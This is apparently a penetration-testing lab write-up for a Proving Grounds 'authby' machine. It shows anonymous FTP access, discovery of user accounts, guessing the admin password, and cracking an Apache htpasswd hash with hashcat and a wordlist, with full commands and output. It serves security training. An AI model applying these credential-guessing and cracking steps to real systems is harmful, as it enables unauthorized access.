FTP
Nmap discovered a FTP server on the target port 21
The running service is zFTPServer 6.0 build 2011-10-17
Null Session
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ ftp $IP
Connected to 192.168.203.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.203.46:kali): anonymous
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> The target FTP instance allows anonymous access
ftp> ls
229 Entering Extended Passive Mode (|||2049|)
150 Opening connection for /bin/ls.
total 9680
---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
---------- 1 root root 25 Feb 10 2011 UninstallService.bat
---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
---------- 1 root root 17 Aug 13 2011 StopService.bat
---------- 1 root root 18 Aug 13 2011 StartService.bat
---------- 1 root root 8736 Nov 09 2011 Settings.ini
dr-xr-xr-x 1 root root 512 Mar 01 03:22 log
---------- 1 root root 2275 Aug 09 2011 LICENSE.htm
---------- 1 root root 23 Feb 10 2011 InstallService.bat
dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
dr-xr-xr-x 1 root root 512 Aug 03 2024 accounts
226 Closing data connection.This appears to be the installation directory of the FTP server itself; zFTPServer
ftp> less Settings.ini
Access denied
ftp> less InstallService.bat
Access denied
ftp> put test
local: test remote: test
200 EPRT Command successful.
550 Access deniedHowever both read and write access is not granted
ftp> cd extensions
250 CWD Command successful.
ftp> ls
229 Entering Extended Passive Mode (|||2077|)
150 Opening connection for /bin/ls.
total 0
226 Closing data connection.
ftp> cd certificates
250 CWD Command successful.
ftp> ls
229 Entering Extended Passive Mode (|||2079|)
150 Opening connection for /bin/ls.
total 0
226 Closing data connection.
ftp> ls
229 Entering Extended Passive Mode (|||2075|)
150 Opening connection for /bin/ls.
total 21043
---------- 1 root root 136 Mar 30 2020 stor-2020-03-30.log
---------- 1 root root 386 Mar 30 2020 retr-2020-03-30.log
---------- 1 root root 0 Mar 01 03:22 log-2025-02-28.log
---------- 1 root root 370 Aug 03 2024 log-2024-08-02.log
---------- 1 root root 574 Jul 10 2020 log-2020-07-09.log
---------- 1 root root 71178 Mar 30 2020 log-2020-03-30.log
---------- 1 root root 930 Mar 27 2020 log-2020-03-26.log
---------- 1 root root 568 Mar 25 2020 log-2020-03-24.log
---------- 1 root root 568 Mar 05 2015 log-2015-03-05.log
---------- 1 root root 1134 Feb 28 2015 log-2015-02-27.log
---------- 1 root root 572 Nov 03 2014 log-2014-11-03.log
---------- 1 root root 1712 May 22 2013 log-2013-05-22.log
---------- 1 root root 2440 Jun 12 2012 log-2012-06-11.log
---------- 1 root root 1142 May 25 2012 log-2012-05-24.log
---------- 1 root root 208 Dec 15 2011 log-2011-12-15.log
---------- 1 root root 944 Dec 15 2011 log-2011-12-14.log
---------- 1 root root 1150 Dec 14 2011 log-2011-12-13.log
---------- 1 root root 208 Dec 13 2011 log-2011-12-12.log
---------- 1 root root 6877584 Nov 09 2011 log-2011-11-09.log
---------- 1 root root 14575458 Nov 09 2011 log-2011-11-08.log
226 Closing data connection.Lots of log files
Username Disclosure
ftp> cd accounts
250 CWD Command successful.
ftp> ls
200 EPRT Command successful.
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x 1 root root 512 Aug 03 2024 backup
---------- 1 root root 764 Aug 03 2024 acc[Offsec].uac
---------- 1 root root 1032 Mar 01 03:31 acc[anonymous].uac
---------- 1 root root 926 Aug 03 2024 acc[admin].uac
226 Closing data connection.
ftp> cd backup
250 CWD Command successful.
ftp> ls
200 EPRT Command successful.
150 Opening connection for /bin/ls.
total 4
---------- 1 root root 764 Jul 10 2020 acc[Offsec].uac
---------- 1 root root 1030 Jul 10 2020 acc[anonymous].uac
---------- 1 root root 926 Jul 10 2020 acc[admin].uac
226 Closing data connection.The account directory discloses users;
Offsecanonymousadmin
admin
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ ftp admin@$IP
Connected to 192.168.203.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>After several trials and errors, I found the password of the admin user; admin
ftp> pwd
Remote directory: /
ftp> ls
229 Entering Extended Passive Mode (|||2133|)
150 Opening connection for /bin/ls.
total 3
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.
ftp> put test
local: test remote: test
229 Entering Extended Passive Mode (|||2137|)
150 File status okay; about to open data connection.
0 0.00 KiB/s
226 Closing data connection.
ftp> ls
229 Entering Extended Passive Mode (|||2138|)
150 Opening connection for /bin/ls.
total 3
-r--r--r-- 1 root root 0 Mar 01 05:57 test
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.This appears to be a web root directory and write access is granted
index.php
ftp> more index.php
<center><pre>Qui e nuce nuculeum esse volt, frangit nucem!</pre></center>This is the same riddle found in one of the headers at the web server
.htpasswd
ftp> more .htpasswd
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0The .htpasswd file contains the credential hash of the offsec user
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ hashcat --show offsec.hash
1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | FTP, HTTP, SMTP, LDAP Server
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ hashcat -a 0 -m 1600 offsec.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Host memory required for this attack: 3 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0:elite
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
Time.Started.....: Fri Feb 28 22:54:03 2025 (1 sec)
Time.Estimated...: Fri Feb 28 22:54:04 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 46891 H/s (6.89ms) @ Accel:64 Loops:500 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 25344/14344385 (0.18%)
Rejected.........: 0/25344 (0.00%)
Restore.Point....: 24576/14344385 (0.17%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:500-1000
Candidate.Engine.: Device Generator
Candidates.#1....: 280690 -> 360360
Hardware.Mon.#1..: Util: 69%
Started: Fri Feb 28 22:53:46 2025
Stopped: Fri Feb 28 22:54:06 2025Password hash cracked for the offsec user; elite
.htaccess
ftp> more .htaccess
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>The .htaccess file reveals that the cracked credential of the offsec user is for the web server